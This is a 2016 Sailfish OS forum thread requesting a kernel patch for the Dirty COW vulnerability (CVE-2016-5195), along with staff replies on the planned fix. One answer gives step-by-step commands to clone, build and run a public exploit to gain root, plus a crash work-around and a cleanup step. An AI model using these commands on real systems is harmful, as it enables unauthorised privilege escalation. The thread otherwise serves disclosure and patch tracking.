We have moved to a new Sailfish OS Forum. Please start new discussions there.
39

[patch-request] Sailfish kernel and dirty cow CVE-2016-5195 [released]

Tracked by Jolla (In release)

asked 2016-10-21 10:56:29 +0200

cy8aer gravatar image

... are there any thoughts about kernel patches like https://dirtycow.ninja? Is ist possible?

edit retag flag offensive reopen delete

The question has been closed for the following reason "released in a software update" by molan
close date 2016-12-01 16:25:33.157544

4 Answers

Sort by » oldest newest most voted
27

answered 2016-11-02 15:02:28 +0200

jovirkku gravatar image

Our plan is to include the fix to the upcoming 2.0.5 release.

edit flag offensive delete publish link more

Comments

3

Glad to hear that :)

Mariusmssj ( 2016-11-02 16:01:49 +0200 )edit
1

SailfishOs = World 's Most Secured Smartphone OS

p_pahare ( 2016-11-02 17:25:04 +0200 )edit
1

So this means 1-2 months from now for those who don't use developer previews? When the bug is being exploited in the wild?

Federico ( 2016-11-02 19:50:58 +0200 )edit
2

@Federico The bug isn't remote-exploitable, so as long as you only install and use trustworthy software, the risks aren't that huge on a phone. Of course, if an attacker manage to get remote access on the user account, dirty cow could still be used to gain root, so the risks aren't negligible. All in all, I'm not that worried about this. Remote attacks on e.g. the broken wifi-drivers are worse, imo. (Thanks for that, Qualcomm, and thanks for the free and swift bugfixes! Your products are really trustworthy, and I'm really looking forward to buy another device made with your chips again! /sarcsasm)

Fuzzillogic ( 2016-11-02 23:01:54 +0200 )edit
16

answered 2016-10-21 12:11:47 +0200

coderus gravatar image

I have compiled and tried exploit on my Jolla C and it totally freeze my phone, so i need to pull battery. This means no easy way to use this exploit on Jolla C :D

edit flag offensive delete publish link more

Comments

3

A bug has been filed about this CVE.

jovirkku ( 2016-10-21 14:19:12 +0200 )edit
3

so you will fix and exploit will work? :D

coderus ( 2016-10-21 15:01:34 +0200 )edit

The exploit seems to work on my C.

g7 ( 2016-10-21 16:41:33 +0200 )edit

share compiled binary please

coderus ( 2016-10-21 16:46:44 +0200 )edit
2

@coderus: here it is, compiled on-device from these sources.

g7 ( 2016-10-21 17:00:17 +0200 )edit
10

answered 2016-10-29 17:41:25 +0200

00prometheus gravatar image

The Dirty Cow hack works very well on a Jolla. Dirty Cow has a well-known issue that crashes Linux unless you disable writeback, however that has a simple work-around.

To test on your own phone:

pkcon install gcc gcc-c++
git clone https://github.com/gbonacini/CVE-2016-5195.git
cd CVE-2016-5195/
make
./dcow ; su

Use: dirtyCowFun as your password

You are now root! However, to avoid an imminent crash, you must quickly also do:

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

This has all been run and verified on both my Jolla1 and my FairPhone2, so the exploit is very much valid for Sailfish!

Finally, to close the hole you just opened to get root, you should:

cp .ssh_bak /etc/passwd

WARNING! Unless you understand the details about /etc/passwd, you should not try this exploit: You risk opening your phone to the world! This will quickly result in your phone becoming a bot-net zombie for spammers, your ip added to all sorts of blacklists, and your battery being continuously drained to email hundreds of thousands of spam.

edit flag offensive delete publish link more

Comments

This very brilliantly demonstrates the need for an urgent kernel patch for the Jolla systems

Richard

richardski ( 2016-10-31 12:56:00 +0200 )edit

Having seen how easy this is to exploit, I'm currently very nervous about connecting my phone to any network and fully agree that this should be fixed in an urgent kernel patch/hotfix release.

Frederik

FrederikF ( 2016-11-01 00:20:50 +0200 )edit

It's not quite that bad on a phone, since you have to log in with a user account before you can run the exploit. Usually, only the owner of the phone has an account on it. So, unless you have ssh enabled with a weak password, you should be OK. However, on a multi-user Linux server, it is a disaster!

00prometheus ( 2016-11-01 04:05:26 +0200 )edit

That is true if you are sure that none of the applications you have installed is able to run unchecked code. (OK, we're talking about two separate exploits really, but then people have called me paranoid before, when it comes to computing)

FrederikF ( 2016-11-01 21:47:20 +0200 )edit
8

answered 2016-10-28 16:00:34 +0200

lpr gravatar image

New Kernel 3.4.113 does include a patch. Now we have to wait until it shows up on devices...

edit flag offensive delete publish link more

Question tools

Follow
8 followers

Stats

Asked: 2016-10-21 10:56:29 +0200

Seen: 2,106 times

Last updated: Nov 02 '16